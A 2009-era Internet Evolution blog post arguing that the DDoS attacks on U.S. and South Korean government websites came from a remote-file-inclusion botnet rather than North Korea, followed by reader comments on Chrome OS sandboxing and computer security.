I've been getting the same press query over and over the last couple of days: "Why are there currently DDoS (distributed denial-of-service) attacks on U.S. and South Korean government Websites?" My cryptic response: "Because the hackers can, and we as the community supply the ammunition."
Blaring headlines such as "N. Korea suspected in U.S. hack attack," or "After US, cyber attackers target South Korea," resort to blaming the usual convenient, politically motivated suspects like North Korea and China. But note the extensive use of "suspected" in these accounts; no proof doesn't get in the way of a damn good story. So let's rephrase and ask better questions, like what, where, and who?
What? Well, the good and bad news was reported first on Internet Evolution; this form of attack is remote file inclusion (RFI) in its origin. Over the past weekend and early this week, we estimated the equivalent of 35,000 computers in the form of a botnet to attack Websites like the U.S. Department of Treasury; Department of State; Federal Trade Commission; and Federal Aviation Administration, for 22 sites total. In Korea, sites at the National Assembly and the Blue House were attacked, for a total of 13 sites.
Botnets are usually measured by the number of PCs used; in this instance, what will emerge is also a large number of compromised hosts, i.e., complete Internet servers, each of which is the equivalent of several thousand PCs in botnet terms.
An example of the infected machines that are used in the attack is a Trojan like the one shown here. A few researchers have noted the apparent low level of malware or botnet management writing involved here. This is fairly simple to explain, since the main objective is to quickly gain access to DDoS resources; low-level malware/Trojans do more than a reasonable job, as this series of attacks has shown.
Where? What confuses this whole issue is the "suspected" political rhetoric from some press sources; as it's repeated around the Internet, the word gets lost in translation. Added to which, governmental agencies (especially the military) and lobbyist PR machines rapidly jump on the bandwagon to justify existing and new budget increases to fight the scourge of these suspected, but still unidentified, combatants.
In this incident, two of the servers responsible are in governmental agencies in Morocco and Malaysia. Does this mean Morocco or Malaysia is declaring cyberwar against the U.S. or South Korea? Of course not. These are simply compromised servers, and hackers operate from behind or inside governmental servers because they are less likely to be blocked. It also aids in confusing the observer.
Who? This is a group of hackers now developing and using RFI techniques primarily of Indonesian and Brazilian origin. Historically, this essentially derives from Website defacement activities, based on IRC botnets. More worrisome, these groups have more recent active associations with known cybercrime servers in Russia and Ukraine, associated with the now-defunct 3FN, closed down by FTC. The profit potential coupled with the bragging rights to this achievement illuminates my earlier statement that hackers do this because they can.
I should solve the final part of the cryptic puzzle. Why do we, the community, supply the ammunition? This is actually the simplest question of all. Part of the hacking scripts underlying this attack automatically search vulnerability advice Websites for current, active Internet security vulnerabilities. Merely add to this a further automated search of Websites with such vulnerabilities, and presto, you have a great list for injection (i.e., file inclusion) to compromise, and then build a high-performance DDoS botnet.
Here are another couple questions to debate: What happened to the $17 billion spent by the Department of Homeland Security since 2001 to defend against attacks on U.S. government servers? Doesn't this demonstrate again the need for funding to prevent these attacks at their source(s)? The security band-aids and aspirins haven't worked. It's high time we began using more preventive ammunition.
— Jart Armin, Editor of RBNexploit.com, a watch blog on the infamous RBN (Russian Business Network), and HostExploit.com
Thank you again Jart for looking at a headline story and applying logic to a serious subject. What I find scary is that blame is apportioned so quickly. As always seems to be the case, when researched properly, there is more to the story than simply what is put out through the press.
Hi Jart, You see, its such a two edge sword with our government involved in anything. Of course we need their resources, fiscally and to a degree with personnel. But at what cost?
As you point out, are these trumped up charges against N. Korea, to promote funding and political rhetoric to increase spending for the military complex?
It would seem more important to expose the culprits than use the event as an excuse to point fingers at the next target of our agression.
Chrome does one thing well: it runs each "tab" in its own address space. In this way each "tab" is protected* from the other tabs and the o/s is protected from the web programs. this is identical to the problem state / supervisor state model that was established by IBM for the System/360 -- so many years ago.
now the "Chome O/S" as I understand it is a bit of Linux with the Chrome browser installed and access to Goggle/Cloud computing
so this is a step in the right direction -- as is the Cherry-Pal concept -- but these are limited solutions. are they what we are looking for?
* protected tab: the web-program* that is running in the tab has its own storage protect key and runs in RING3: it cannot initiate I/O on its own and it cannot read or write any RAM other than its own: it cannot snoop into another web program and it cannot modify another web program
* web program: all modern documents -- web pages, word documents, excel sheets, pdf files, flash etc etc -- must now be considered to be executable programs and handled as such. this means they have to be run in RING3/protected mode. hackers will attempt to put bugs in the source code (web page, flash etc ) such as to mis-direct the interpreter (browser, Acrobat reader etc ). but if the interpreter is running in RING3 even if the hacker has a successful bug in the source code he will still fail -- because the interpreter that he gets control of -- has no authorizations.
There are bugs in Chrome but they’re very hard to exploit. I have a Chrome vulnerability right now but I don’t know how to exploit it. It’s really hard. The’ve got that sandbox model that’s hard to get out of. With Chrome, it’s a combination of things — you can’t execute on the heap, the OS protections in Windows and the Sandbox. I might have this bug and I might be able to get code execution. But now you’r ein a sandbox and you have no permissions to do anything. You need another bug to get out of the sandbox. Now you need two bugs and two exploits. That raises the bar.
"Speed, simplicity and security are the key aspects of Google Chrome OS," in its official blog.
Also Google has now announced it is working with many firms on Chrome OS hardware including Acer, Asus, Freescale, Hewlett-Packard, Lenovo, and Toshiba.
Perhaps of equal importance Google and Adobe are also working on this OS together, due to the importance of PDF and flash.
I have to say this may be the most important security news for years, pity we will only be able to get it for netbooks in 2010.
Over the years Microsoft has taken most of the heat for creating an operating system that allows for botnet takeovers. With the announcement of Google's Chrome the question is if we will finally have a consumer friendly (Linux is good - but has never conquered the consumer world) operating system that has security built in from the ground up.
Since Chrome is built around net browsing, I hope they focus on the anti-virus, anti-spyware and anti-malware needs.
Computer Security could be provided on the x86 architecture chip.
Obviously security has not been provided
now the question: why not?
is it impossible? is it un-necessary? or is it un-wanted? too expensive?
when digging into puzzling questions it is often useful to ask cui bono?
do we have a contingent out there conducting data mining that insists on having a way into every computer?
Windows started as a DOS/shell program and was later re-packaged as an O/S, --a network O/S at that. Is the lack of security just an over-sight? "We'll get to it; just hold on there!!"
Security has been lacking now for a rather long time
we may be forced to seek an alternate way out such as returning Windows to its proper role as a shell program -- but running it under VM/Ware. The question then becomes: is VM/Ware tight enough for our needs?
IMMEDIATE ACTION
We need a software inventory audit tool: a bootable CD (or USB) that will allow us to (1) take our computer offline, and then (2) inventory the software, reporting and/or removing anything that cannot be authenticated.
This goes to the detection and response aspects of security. The A/V defense programs we have been using are good -- as far as they go. Obviously we need to shore up the defense here and creating an inventory audit tool could be done this year yet.
The ThinkerNet does not reflect the views of TechWeb. The ThinkerNet is an informal means of communication to members and visitors of the Internet Evolution site. Individual authors are chosen by Internet Evolution to blog. Neither Internet Evolution nor TechWeb assume responsibility for comments, claims, or opinions made by authors and ThinkerNet bloggers. They are no substitute for your own research and should not be relied upon for trading or any other purpose.
Fatal System Error, the book just released by West-coast-based journalist Joseph Menn, is really a public policy statement written as a thriller for a wider reading public. UPDATED 2:45 PM
If you were a criminal looking to hide money-laundering operations, anonymously rent swaths of Web infrastructure for Internet badness, or create a financial base to threaten national security, where would you look? Panama? Liechtenstein? Offshore islands?
Most users have become accustomed to providing social-networking Websites with extensive personal details, information about friends, pictures, and connections. But new hacks out in the wild -- and already in the hands of the bad guys -- demonstrate that any thought of privacy or anonymity is a myth. Sites like Facebook, Bebo, LinkedIn, and Orkut are leaking personal information like an open faucet.
The open-source whistleblower site, Wikileaks, which according to The National has “produced more scoops in its short life than the Washington Post has in the past 30 years,” has temporarily and voluntarily suspended its own service.
Smarter Collaboration: How to Thrive in a Challenging Business Environment Market conditions are changing faster than ever, and organizations need to improve their agility and adaptability in order to provide better service and improve processes. The ability to work with customers, business partners, and employees as effectively as possible - while at the same time holding down costs - is a key to success. READ THIS eBOOK
your weekly update of news, analysis, and
opinion from Internet Evolution - FREE! REGISTER HERE
Wanted! Site Moderators Internet Evolution is looking for a handful of readers to help moderate the message boards on our site – as well as engaging in high-IQ conversation with the industry mavens on our thinkerNet blogosphere. The job comes with various perks, bags of kudos, and GIANT bragging rights. Interested?
To save this item to your list of favorite Internet Evolution content so you can find it later in your Profile page, click the "Save It" button next to the item.
Cyber Warfare may be the next frontier for tactical hacking. It has already reared its head in Estonia, Russia, and Georgia, and some say it has been used by North Korea, China, and other world powers. The implications and the potential are both fascinating and scary.
E-discovery is the requirement to make available all digital information related to, and in conjunction with, a legal proceeding. An appeals court ruled recently to limit the scope of e-discovery searches, which gives corporate counsel and IT executives a bit more power over the e-discovery process.
Industry initiatives and government stimulus funds are giving enterprise software vendors a great opportunity to help build out and manage smart grid technologies.
The release of Microsoft's newest OS raises the question of the company's relevance in an era when Google dominates applications and search, and Apple runs circles around Redmond with its gadgets and user interfaces.
In the final episode of this series about the death of Internet anonymity, Saunders describes how the Internet of the future will start to attain a level of intelligence that requires no human intervention. Scary.
What can users today do to protect their online privacy? The simplest and most obvious option is to not use the Internet – at all. However, once all digital information is consolidated over the Internet, trying to protect digital identity by simply unplugging from the Internet becomes impossible – a fact that has manifest implications for civil liberties, Saunders says.
By 2011 the number of Internet-connected sensors will exceed 1 trillion, making your chances of doing anything or going anywhere unnoticed pretty much zero. Saunders talks about how the 'sensortization' of the Internet is eliminating the traditional divide between online and offline populations.
The 20th Century Internet was characterized by the ability to interact with other people and information on the Internet largely without anyone knowing who you were. The Internet of this century, conversely, will be defined by identity. Saunders explains how Internet users are unwittingly contributing to the demise of the anonymous Internet.
Research shows that the youth of today like Facebook – but not blogging or Twitter. Does that mean Facebook has won, or just that it's not yet out of favor? Will all the services we see today fade into Ovaltine-or-Wheaties status in just a few years?
What kinds of companies are doing the most innovation in the data center? Turns out it's midtier enterprises that are taking the "Just Right" approach.
Digg
Del.icio.us
Reddit
Email This
TWEET THIS
